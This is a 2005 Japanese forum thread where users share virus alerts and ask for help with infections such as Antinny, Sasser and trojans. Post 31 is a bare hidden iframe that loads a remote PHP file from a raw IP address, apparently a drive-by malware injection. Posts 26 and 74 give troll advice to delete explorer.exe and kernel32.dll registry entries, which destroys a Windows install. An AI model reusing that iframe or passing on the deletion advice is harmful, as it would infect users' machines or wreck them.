ウィルス情報&質問 総合スレッド☆Part29

このエントリーをはてなブックマークに追加
1名無しさん@お腹いっぱい。
ウィルスに関わる話題・質問はこちら。
Winny関連のウィルスは、Download板に専門スレッドがあります。

【  最  重  要  事  項  】
ウィスルやブラクラだと思われる物の直リンは厳禁!!!!!!!!!!
質問の時は頭の『ht』を抜いて貼り付ける事

尚、質問・回答が効率的に行えるよう、質問時には次のテンプレを使用してください



【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】

テンプレサイト(質問する前、書き込む前に必読)
コンピュータウィルス総合スレッド テンプレミラーサイト(PC初心者板)
http://pcqa.tripod.co.jp/virus.htm
【警報】Winnyを狙ったワーム・ウイルス情報 テンプレまとめサイト(Download板)
http://www.geocities.jp/kemkzuenc/Antinny.html
2名無しさん@お腹いっぱい。:2005/03/21(月) 21:20:41
■■ウィルス定義データは定期的に更新しよう■■
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。

最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。

■■ワクチンメーカーリンク集■■  ※ウィルス監視ソフトをワクチンソフトとも呼びます。

・トレンドマイクロ株式会社 http://www.trendmicro.com/jp/home/personal.htm
 製品名:ウイルスバスター2005インターネットセキュリティ他
・株式会社シマンテック http://www.symantec.com/region/jp/
 製品名:NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)
http://www.vintage-solutions.com/Japanese/
 製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン http://www.aladdin.co.jp
 製品名:eSafeProtect
・コンピュータアソシエイツ株式会社 http://www.caj.co.jp/
 製品名:InocuLAN、CheyenneAntiVirus
・マカフィー株式会社 http://www.mcafee.com/jp/default.asp
 製品名:McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
 http://www.nai.com/japan/download/dat3end.asp (リンク切れ)
 該当する場合は諦めてノートンかウィルスバスターを買いましょう。
3名無しさん@お腹いっぱい。:2005/03/21(月) 21:21:48
■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
 →常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
 →知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
 →ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
 →アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
 →怪しいファイルにウィルスが混入しているケースもよくあることです。
  怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
 もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
 http://www.ipa.go.jp/security/outline/todokede-j.html
 こちらに届け出の方法などが記載されています。
 E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。
4名無しさん@お腹いっぱい。:2005/03/21(月) 21:26:32
W32.Sasser.Wormとその亜種にご注意!!
このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、 出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、 ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、 メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.mspx
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D
5名無しさん@お腹いっぱい。:2005/03/21(月) 21:28:01
Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。

Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html
6名無しさん@お腹いっぱい。:2005/03/21(月) 21:29:55
「W32/Netsky」ウイルスの亜種(Netsky.Q)に関する情報
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
  * Mail Delivery System (<受取人メールアドレス>)
  * Failure (<受取人メールアドレス>)
  * Delivered Message (<受取人メールアドレス>)
  * Deliver Mail (<受取人メールアドレス>)
  * Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
   例: date7386.pif 、 message19392.zip など

「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
  * Error
  * Status
  * Server Report
  * Mail Transaction Failed
  * Mail Delivery System
  * hello
  * hi
  [ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
  "test"
  "The message contains Unicode characters and has been sent as a binary attachment."
  "The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
  "Mail transaction failed. Partial message is available."
  [ 任意の文字列 ]  [ 空白 ]
・添付ファイル名: ランダムなアルファベット
7名無しさん@お腹いっぱい。:2005/03/21(月) 21:32:06
「がいしゅつです」Q&A
Q1.ノートンを使っていたら、2chのログからウィルスを発見しました。
   ノートンをインストールしたら2chに書けなくなりました。
A1.ここを読みましょう。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8

Q2.ウィルスを検出しましたが、どんなウィルスかわかりません
A2.各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
http://www.symantec.com/region/jp/sarcj/vinfodb.html
・Trend Micro ウイルス情報
http://www.trendmicro.co.jp/vinfo/virusencyclo/default.asp
・McAfee ウイルス情報
http://www.mcafeesecurity.com/japan/security/vlibrary.asp

Q3.「世界の中心で生まれてきてすいません」という表示が出てきました 。
  デスクトップの背景が蓮画像になってしまいます 。
A3.Winny関連ウィルスですので、Download板へどうぞ。
  ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ニュイルス情報 Part36
http://tmp4.2ch.net/test/read.cgi/download/1111385299/

Q4.アンチウィルスソフトを持っていないのですが、無料のものはないですか?
A4.このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト Part5
http://pc5.2ch.net/test/read.cgi/sec/1107065884/

Q5.ホームページが変なページになってしまいます
A5.ウィルスではなくスパイウェアですので、こちらへどうぞ
エロサイト見たら…助けて下さい!Part52
http://pc5.2ch.net/test/read.cgi/pcqa/1111405528/
8名無しさん@お腹いっぱい。:2005/03/21(月) 21:33:20
関連スレッド

Winnyを狙ったワーム・ニュイルス情報 Part36
http://tmp4.2ch.net/test/read.cgi/download/1111385299/
sasser【スタコラサッサ】sasser Part2
http://pc5.2ch.net/test/read.cgi/sec/1083839516/
Blasterスレ part5
http://pc5.2ch.net/test/read.cgi/sec/1065964513/
【差出人】WORM_NETSKY【詐称】
http://pc5.2ch.net/test/read.cgi/sec/1080741342/
「Nimda !! 」【その4】
http://pc5.2ch.net/test/read.cgi/sec/1001864573/
エロサイト見たら…助けて下さい!Part52
http://pc5.2ch.net/test/read.cgi/pcqa/1111405528/
【緊急!】ウィルス即行駆除方法【助けて!】
http://pc5.2ch.net/test/read.cgi/sec/1091174837/
ファイアーウォールソフト 総合Part4 (DAT落ち)
http://pc5.2ch.net/test/read.cgi/sec/1074563750/
アンチウィルスソフトのウィルス誤検出
http://pc5.2ch.net/test/read.cgi/sec/1027753135/
毎日ウィルスメールが送られてくるのですが・・2通目
http://pc5.2ch.net/test/read.cgi/sec/1086494732/

関連スレは次スレに移行してる場合もあります。


質問する前に検索しましょう
http://www.yahoo.co.jp/
http://www.google.co.jp/
9名無しさん@お腹いっぱい。:2005/03/21(月) 21:36:07
(一応)前スレ
ウィルス情報&質問 総合スレッド☆Part28
http://pc5.2ch.net/test/read.cgi/sec/1108718666/

テンプレ終了。
貼り落とし・最新情報への更新忘れ等あった場合は随時修正願います。
10名無しさん@お腹いっぱい。:2005/03/21(月) 21:43:41
>>1
乙です。

ググったけど、英語でよくわからない!人は

Excite エキサイト 翻訳  英語翻訳>ウェブページ翻訳
ttp://www.excite.co.jp/world/english/web/

を使ってみよう。
11名無しさん@お腹いっぱい。:2005/03/21(月) 23:40:56
>>1
乙。

PC関係の用語が分からない場合は、下記のサイトでも調べて見ましょう。
・IT用語辞典e-Words
http://e-words.jp/
・アスキーデジタル用語辞典
http://yougo.ascii24.com/
12名無しさん@お腹いっぱい。:2005/03/22(火) 18:59:39
ここで一句

人権法 政府モードで 2ちゃん削除
13名無しさん@お腹いっぱい。:2005/03/22(火) 19:38:53
Kerio4をインストルしたんですけど、インストールしただけで、
ファイアーウォールは機能しているでしょうか?

詳しい設定方法わかる人、お願いします。
3番を見ましたがわかりませんので、簡単にお願いします。
14名無しさん@お腹いっぱい。:2005/03/22(火) 19:52:09
>>13
機能しています。心配いりません。
15名無しさん@お腹いっぱい。:2005/03/22(火) 19:57:36
よかった。アンインストールしようか迷ってました。
右下のアイコンにも表示されないので。

念をいれて他スレでも聞いてきます。
16名無しさん@お腹いっぱい。:2005/03/22(火) 20:03:31
w32.hllw.antinnyに感染したのですが、すこし様子がおかしいです。
普段ならノートンで削除できるのに、なぜか削除しようと思ってもできません。
それならと直接感染ファイルを削除しようと思い、ノートンにC\:Documents and Settingsの
Ownerのフォルダにあるlocal settingというフォルダの0000000というファイルが感染しているとでたので
c→documents setting→ownerのフォルダまでいったのですが、どこにもlocal settingというフォルダがないのです。
隠しフォルダでもなさそうでした。
ちなみにノートンからフォルダ指定で絞込みのウイルススキャンするときは、このlocal settingというフォルダがでてきて選択できます(そこから削除は無理)
これはどうなってるのですか?パソコン詳しい人おしえて!
17名無しさん@お腹いっぱい。:2005/03/22(火) 20:15:27
>>16
パスが違いますですよ。ログをよくみなおしてください。
18名無しさん@お腹いっぱい。:2005/03/22(火) 20:23:09
>>16
>w32.hllw.antinnyに感染した
>普段ならノートンで削除できるのに
ダウソ板へ(・∀・)カエレ!
19名無しさん@お腹いっぱい。:2005/03/22(火) 23:11:52
WindowsXPSP1、ノートンインターネットセキュリティを使用しています。

ネットをしようと思ってIEを立ち上げたら、アドレスの部分がずっと閉じたり開いたりを繰り返します。
また、クリックしても何の反応もありません。
一度だけですが、色々なファイルがいきなりたくさん開きだした事もあります。
その時は恐くなって電源を切ってしまいました。
対策として、LANケーブルを抜く・ノートンの更新・スキャンをしましたが
ウィルスは発見できず感染もしていませんでした。

もうどうしたらいいか、本当にわかりません。
パソコンが使えないので携帯でこちらに相談することしか思いうかびませんでした。
お力をお貸し頂けないでしょうか?
どうぞよろしくお願い致します。
2019:2005/03/22(火) 23:20:04
何でかしりませんが治りました!
本当によかった…。
スレ汚し大変失礼致しました。
21名無しさん@お腹いっぱい。:2005/03/23(水) 04:24:21
シマンテックのサービスで全部安全になったんですけど、
YahooBBシマンテックのチェックで、ものすごく無防備ですぐに進入されます
=すごく低い、になって、

購入するページに行くように書かれていたんですけど、

何故、こんなに差があるのでしょうか?どっちが本当なんですか?
22名無しさん@お腹いっぱい。:2005/03/23(水) 11:43:37
〔注意〕して下さい。
ttp://alink.uic.to/user/ararara.html
これは
なんですか??
ウィルスの類ですか??
もしそうなら対処法教えてください。
23名無しさん@お腹いっぱい。:2005/03/23(水) 12:29:39
>>22
この板では鑑定はしない。
ラウンジ@2ch掲示板http://etc3.2ch.net/entrance/の
勇気が無くて見られない画像解説スレ Part681
http://etc3.2ch.net/test/read.cgi/entrance/1111340653/l50へ

ウィルスかどうかは自分でウィルススキャンして判断してください。
2422です:2005/03/23(水) 13:01:14
>>23
板違い忠告ありがとうございました。
そちらのほうで質問してきます。
25名無しさん@お腹いっぱい。:2005/03/23(水) 13:33:20
>>24
てめー!よくもやりやがったな!
これ、telenetIP抜きだろ。

思わずやられちゃったよ。_| ̄|○ ガックシ
26名無しさん@お腹いっぱい。:2005/03/23(水) 17:49:35
【使用OS】 Windows98
【WindowsUpdateしてるか】 していない
【AntiVirusは何を使っているか】 入っていたけど起動時間を短くするためアンインストールした
【ちゃんとUpdateしてるか】 していない
【スキャンした結果(ウイルス名・発見場所)】 してない
【別のオンラインスキャンしたならその結果は】 してない
【症状を具体的に、分かる限りすべて書く】 セーフモードでも起動不能
【何をしたらそんなことになったのか】 winnyで違法ファイルを拾って実行
【これまでにとった措置】
画面が乱れて慌てて電源ボタンを押して強制終了した。
再起動させてみると起動できなくなったので、セーフモードで起動した。
レジストリエディタを開いて、explorer.exeとkernel32.dllを検索して見つかったのを全部消した。
【その他の質問】
もうwinnyは懲り懲りです。
二度とwinnyなんてやりません。
winnyで集めてきたファイルなどは全て諦めて1からやり直します。
こうなったのは自分の責任です。
どうすればいいのか教えて下さいお願いします。
27名無しさん@お腹いっぱい。:2005/03/23(水) 17:59:36
>>26
pasokonnbukkowasitesurerutoii
28名無しさん@お腹いっぱい。:2005/03/23(水) 19:33:12

【使用OS】 XP
【WindowsUpdateしてるか】 自動更新
【AntiVirusは何を使っているか】 マカフィー
【ちゃんとUpdateしてるか】 自動更新
【スキャンした結果(ウイルス名・発見場所)】 発見されない
【別のオンラインスキャンしたならその結果は】 発見されない(トレンドマイクロ)
【症状を具体的に、分かる限りすべて書く】 今のところ無い
【何をしたらそんなことになったのか】 なし
【これまでにとった措置】 なし
【その他の質問】
コレを踏みました。鑑定スレでウイルスと言われましたがマカフィ無反応
スキャンしても検出なしです。何なんでしょうか
ttp://f11.aaa.livedoor.jp/~hiho/imgboard/wall/img-box/img20041127040903.jpg
29名無しさん@お腹いっぱい。:2005/03/23(水) 20:12:27
>28
ウイルス
30名無しさん@お腹いっぱい。:2005/03/23(水) 20:31:43
ウィルスって怖い

【祭り】 同志社大女学生のハメ鳥、イケメン税務姦 7
http://news19.2ch.net/test/read.cgi/news/1111573789/
31名無しさん@お腹いっぱい。:2005/03/23(水) 20:40:16
<iframe src="http://213.159.117.133/dl/ms.php" height="1" width="1"></iframe>
32名無しさん@お腹いっぱい。:2005/03/23(水) 20:46:23
>>28
マカフィー仲間(・∀人∀・)
踏んでみましたw
マカフィーだろうがノートンだろうが、バスターだろうが今じゃどの
アンチウィルス入れ取ればWindowsUpdateちゃんとやってれば絶対に
感染なんかしない。
ただ、セキュリティの警告に「YES」を押さなければの話だけど。
(特にマカフィーはexploitウィルスに強いらしい)
33名無しさん@お腹いっぱい。:2005/03/23(水) 21:38:49
>>32
ほんとですか?!
ついさっきまでウイルス検出されないのに
感染してると思い込んでアタフタしてました
今のところPCに異常もないし
安心しました。ありがとうございました。
>>29
ありがとうございました。
34名無しさん@お腹いっぱい。:2005/03/23(水) 21:39:23
家族共有しているパソコンで
朝パソコン付けて仕事して夕方動作がおかしいと思ったらテキストファイルが
ぬるぽと書かれた123kbのファイルになってしまった。

しかも検索したらCドライブ4000のテキストファイルの内3000近くが123kbのファイルに置き換わっています

これは何が原因なのでしょうか?どう対策をとればいいのでしょうか?
35名無しさん@お腹いっぱい。:2005/03/23(水) 21:41:55
あとレジストリエディタで原因を調べようとしてもメモ帳が立ち上がります。
3634:2005/03/23(水) 21:50:23
【使用OS】 Windowsxppro
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 NOD32
【ちゃんとUpdateしてるか】 最近していない
【スキャンした結果(ウイルス名・発見場所)】 antinnyR.worm 別アカウントのマイドキュメント内
【別のオンラインスキャンしたならその結果は】 してない
【症状を具体的に、分かる限りすべて書く】 Cドライブのテキストファイルが全て123kbになる
レジストリエディタがメモ帳になる。パソコンの速度は支障あまりなし、
テキストファイルのタイムスタンプは3/23AM9:00〜PM17:00と様々全て今日発動
見慣れないファイルを触ったのは昨日の夜らしい、今日起動したのは私本人
【何をしたらそんなことになったのか】 親が知らないファイルを触ったらしい
【これまでにとった措置】
何もしていない
【その他の質問】
37名無しさん@お腹いっぱい。:2005/03/23(水) 21:55:44
>>36
「PandaActiveScan」というオンラインスキャンでウイルスを駆除。
か、OS再インストールだろ
3834:2005/03/23(水) 22:03:47
おお、>>37さんありがとうございます

【その他の質問】 ありました
ぬるぽと上書きされた、テキストデータを元のテキストデータを
元に戻すようなツールは存在しますか?それは「システムの復元」で可能ですか?
現在、心底焦っています。元に戻せない場合重要な情報が全てテキストで保管しているので
仕事に影響が出るから泣きたいです
39名無しさん@お腹いっぱい。:2005/03/23(水) 22:06:03
wrap32.exeなるファイルがZoneAlarmで検出されました。
googleで調べて見ましたが、英語サイトしか出てきません。

これは何なんでしょう?
40名無しさん@お腹いっぱい。:2005/03/23(水) 22:22:55
>>39
ttp://forums.zonelabs.com/zonelabs/board/message?board.id=win_za_msgs&message.id=8779#M8779

この人(↑)は「シマンテックが仕掛けたスパイウェア」だと言ってるが、はてさて(笑)
4134:2005/03/23(水) 22:23:44
34です。写真などjpgなどは無事ですが、設定ファイルにtxtを使うツールが軒並み起動しません
ソースコードや取引先のメモなどが全滅しました。HDDを昔の状態に復旧するツールは今から買えるでしょうか?
何処かコンビニなどで入手できるでしょうか?

42名無しさん@お腹いっぱい。:2005/03/23(水) 22:25:13
>>39
ttp://forums.zonelabs.com/zonelabs/board/message?board.id=win_za_msgs&message.id=8888#M8888

ベリサインからデジタル署名を取ってくるノートンのファイルらしい
43名無しさん@お腹いっぱい。:2005/03/23(水) 22:35:13
>>41
言っておきますが
上書き方式でやられているのでサルベージは不可能です
44名無しさん@お腹いっぱい。:2005/03/23(水) 22:53:41
【使用OS】 XP
【WindowsUpdateしてるか】してる
【AntiVirusは何を使っているか】 ノートン
【ちゃんとUpdateしてるか】してる
【スキャンした結果(ウイルス名・発見場所)】 Adware.CDTを発見。手動削除・・・ノートンさんがやってくれない!
【別のオンラインスキャンしたならその結果は】してない。。。ノートンさん信じてる
【症状を具体的に、分かる限りすべて書く】
Adware.CDTというウイルスに感染していたのと、
起動したら、いつまでもデスクトップ画面にならずに青い画面のままで
しょうがなく強制終了で、また再起動したら今度は青い画面の後復元?みたいな画面になって、ファイル先かなにかの英語がずらーっと下から上へ流れていって、或程度たったらまたもとのデスクトップ画面に戻ってこれた。
全部デリートされちゃったかとびびったけど、今のとこ大丈夫みたい

これって上のウィルスとの因果関係はある?それとも別のなにか??
まじコピーとかされてないよね、ものすごく不安です
ノーとンさんいれてるんだけど、こんな症状はじめてなんですよ
ノートンが悪いのか、それともPCの故障?どっちだろ
【何をしたらそんなことになったのか】
分からない、ほんと突然です。再起動したら突然なりました
【これまでにとった措置】 一応上のウイルスを手動削除、あとはなにもやってません
45名無しさん@お腹いっぱい。:2005/03/23(水) 22:55:58
>>44
その前に、何か報告することがあるはずですよ。Adware.CDTでしょ?
まず、その報告をしてくださいよ。
46名無しさん@お腹いっぱい。:2005/03/23(水) 22:58:33
>>44
なにを報告???
4734:2005/03/23(水) 23:01:09
ありがとうございました。家族や私の不備が原因で全ての書類が全滅しました。
たぶん、会社との関係は悪化し、下手すれば解雇にもなりうりますが、救出不可能と
しっただけでも大きな成果です。

あきらめて、明日からの人生頑張っていきたいと思います
4834:2005/03/23(水) 23:07:09
コレからはまだ生きている書類、画像などをバックアップして新しく再インストールしようと思います。
Cドライブ全滅 Dドライブが無傷なのでデータを何処かに引っ越したいと思います

おそらくannttynyとやらがウイルスらしいのですが、そのウイルスファイルは
何処に潜んでいるのでしょうか?二次感染を防ぐには何処をスキャンすればいいのでしょうか?
あと情報提供してくれた皆さんありがとうございました。一泣きしたらすっきりしました
49名無しさん@お腹いっぱい。:2005/03/23(水) 23:07:27
大事なファイルの割にはバックアップも取ってなかったのな(w
50名無しさん@お腹いっぱい。:2005/03/23(水) 23:08:48
>>48
あきらめれ。一般ファイルにもまぎれて寄生してるから
全部捨てるしかないだろ。
5134:2005/03/23(水) 23:23:58
>>49さん そうですな、その必要がないと思ってバックアップしなかったのは失態です
別のパソコンで書き込んでいます。お隣ではパンダアクティブスキャンがウイルスを一つ拾いました

zipファイルも全滅。2000年4月〜2005年1月までの書類圧縮セットが持っていかれました。
2004年11月までは別にあるからいいけど……半在宅で仕事しているので明日会社に事情を説明します
5244:2005/03/23(水) 23:31:38
>>45
なにを報告???

それと、変になってるもの見つけた。。。
CTRLとDELETEとALT同時に押すとでてくる奴、あれの表示がおかしい。
右上にあるボタン群がまずない。それとCPU使用率とか切り替え表示する奴がない。
なにがタスクで作動してるか表示してるだけで、あとはなにものってない

(((( ;゜Д゜)))ガクガクブルブル おれのPCどうなちゃったの?ノートンさんいれてんのに・・・
5334:2005/03/23(水) 23:38:02
明日じゃ遅いと思ったので電話で報告しました。

解雇されますた。ひとまず、明日は会社に出頭してきます
Annttinyの事を持ち上げた瞬間、部長ブチ切れ。そんなに危険なウイルスとは

本当に住人のおかげで助かったというか解明できたよかった。
死のうかと思ったけど今から頑張って出来ることはやっておこうと思ったよ
就活して1年やっと巡り会えた会社だったが
54名無しさん@お腹いっぱい。:2005/03/23(水) 23:43:16
>>53
5544:2005/03/23(水) 23:51:23
WMIがなんたらかんたらとかいうのが頻繁におこる・・・
56名無しさん@お腹いっぱい。:2005/03/23(水) 23:54:40
ノートンは重いし、エラーが多いからNOD32に変えたら快適だし、安心。
57 :2005/03/24(木) 00:02:08
トロイに感染したみたいです。助けて下さい。

【使用OS】 WindowsXP HomeEdition
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 使っていない。
ときどきadAwareとかを走らせているぐらい。 …すいません買います。

【スキャンした結果(ウイルス名・発見場所)】
トレンドマイクロのオンラインスキャンをしたら
TROJ_AGENT.AE \Local Settings\Temp\
TROJ_BKAZEFIND.A \Local Settings\Temp\
の二つがみつかりました。

【何をしたらそんなことになったのか】
スレに貼ってあったリンクを踏んだらアダルトサイトが開きました。

【その他の質問】
システムの復元でなおりますか?
一応やってみましたが、上の2個はスキャンしたらまた出てきました。
アンチウィルスソフトを買えば駆除できますか?

すみません、よろしくお願いします。
58名無しさん@お腹いっぱい。:2005/03/24(木) 00:19:03
ノートン2002のLive updateができません
それとシステムの保護の有効・無効もできないんですが どうすればいいのでしょうか?
59名無しさん@お腹いっぱい。:2005/03/24(木) 00:40:17
>>57
体験版のウィルスバスターあたり落として駆除してみたらどうだ?
6058:2005/03/24(木) 00:48:23
板違いでした
61名無しさん@お腹いっぱい。:2005/03/24(木) 01:07:23
つーか34さん、頑張ってください。
6257:2005/03/24(木) 01:09:11
>59
レスありがとうございます。
今、とりあえず、検索してでたファイルを削除してみました。
もう1回スキャンかけてるところです。
これで出なかったら大丈夫ですか?
63名無しさん@お腹いっぱい。:2005/03/24(木) 02:48:23
お世話になります
【使用OS】 XP
【WindowsUpdateしてるか】してる
【AntiVirusは何を使っているか】 バスタ
【ちゃんとUpdateしてるか】 してる
【スキャンした結果(ウイルス名・発見場所)】 結果ナシ
【別のオンラインスキャンしたならその結果は】 してね
【症状を具体的に、分かる限りすべて書く】質問にまとめて書きます
【何をしたらそんなことになったのか】 うPロダからDLやらいろいろ
【これまでにとった措置】 ここ
【その他の質問】
最近、頻繁に起動後に「・・・・32dll・・なんたらかんたら」が・・・
マイクロソフトに送信しますか?という画面が出てきます
初めて出てきた後にWindowsUpdateをしたら「更新はありません」となり
何日かして自動更新したんですが相変わらず起動後に同じ場面が
出てくる時があります(毎回ではありません)
それともう一つ
気になる事があります
IEのアクティブバー?というのですか?
サイトのタイトルが文字化けしていたりするのですが・・・
で、どこかのスレで似たような状況の方の書き込みに
「・・・になってるから○○で検索汁」とレスがついていた記憶が残っていますが
↑「・・・」これがどーしても思い出せない
「キーロガー」じゃなくて・・・ああぁ〜思い出せないんです
どなたか宜しくお願いします

6434:2005/03/24(木) 02:49:36
ウイルススキャン完了。綺麗だと思われたPCは12の感染と7の感染疑いがでました。
削除できなかったのはシフトデリートで削除。
Virus:Bck/Iroffer.P
Virus:Trojan Horse
Spyware:Spyware/ISTbar
ただ、anthinnyが出なかったのが気がかり
rededitもないから確認できないし、何処かでDL出来るのでしょうか?
65名無しさん@お腹いっぱい。:2005/03/24(木) 16:27:18
>>63
「・・・・32dll・・なんたらかんたら」のなんたらかんたらを書け。

>・・・になってるから○○で検索汁
「フォントキャッシュ 破損」でぐぐってみ
66名無しさん@お腹いっぱい。:2005/03/24(木) 16:36:35
>>34はantinnyがどんなものなのか理解してるのだろうか?

.....とふと思った。
6734:2005/03/24(木) 16:45:15
>>66さん 正直しりません!症状がファイル改ざんでないようが「ぬるぽ」で
Cドライブが全て感染されて、全部スキャンしたらAnntinnyというウイルスが
出てくるのかなーと思ったんです。だけど出なかったから検出されていないので
正直不安。あと明日からはハローワークにでもいかなきゃ
68名無しさん@お腹いっぱい。:2005/03/24(木) 18:45:18
で、34はnyしてんのか?
6963:2005/03/24(木) 19:11:51
>65さん レスありがとうございます
「・・・・32dll・・なんたらかんたら」のなんたらかんたらを書け。
について
「Generic Host Process for win32 Services」はエラーが発生し
閉じられる必要がありました マイクロソフトに送信しますか?
が正確な内容です

あーそういえばフォント3つほどDLして入れました
ぐぐってみます
ありがとうございました
70名無しさん@お腹いっぱい。:2005/03/24(木) 19:34:28
>>63
フォントキャッシュでぐぐるついでにGeneric Host Process for win32 Servicesでもぐぐってみ。
それで自分に該当しそうな所を見る。
セキュリティソフト関連かドライバー関連かって感じだな。

つーか エラーメッセージがわかってるならまずぐぐるが先決。
それがお前の血となり肉となるw
71名無しさん@お腹いっぱい。:2005/03/24(木) 20:35:20
これって
http://syobon.com/upload/src/syobon22628.zip.html
ウィルスですか?
このファイルダウンロードして2ch女神拾い物リンク集.exe
ってファイルダブルクリックしたら
ハードディスク初期化準備中ってでて
キャンセルしようとするとIDとパスワードもとめられたので
しらないので閉じようとしても閉じれないので
強制終了しようとしたら
「失敗したので終了します」って出て閉じたのですが
そしてしっぱいしたんですが・・・・
不安で仕方ないので誰かこの詳細を教えてください
72名無しさん@お腹いっぱい。:2005/03/24(木) 20:55:03
>71
てめぇ!!!!とんでもねーもんイチイチ貼るなよ!
7371:2005/03/24(木) 20:57:47
っえ?
いったいなんだったの?
74名無しさん@お腹いっぱい。:2005/03/24(木) 21:07:31
そんなに心配なら“アレ”やってみるか?>>71

パソコンのトラブル解消法という奴で初心者でも簡単にできる。
レジストリエディタというアプリケーションを開いて、
Windowsの起動に必要な、explorer.exeとkernel32.dllを検索して
ヒットしたものを全部消して行って、再起動するっていうやつを。
7571:2005/03/24(木) 21:09:35
再起動できなくなるだろ?
76名無しさん@お腹いっぱい。:2005/03/24(木) 21:14:50
ここのHPにはいるとブラウザが無駄にでてきて外国語ばっかでびびってるんですが、
もしかしてウイルスやスパイウェアに感染したのでしょうか?
http://tech.millto.net/~j-maki/novita/
77名無しさん@お腹いっぱい。:2005/03/24(木) 21:17:17
>>75
再起動できなくなるから、リカバリーディスクを用いて
システムリカバリーを行なえば・・・ほうら!
完璧症状が無くなります。
大事なデータも一緒に。
7871:2005/03/24(木) 21:20:20
実際のところ何か分かる人います?
79名無しさん@お腹いっぱい。:2005/03/24(木) 21:39:38
>>78
ジョークソフト。なんにもおきてないよ。
80名無しさん@お腹いっぱい。:2005/03/24(木) 21:41:15
ここは鑑定スレじゃねぇ。

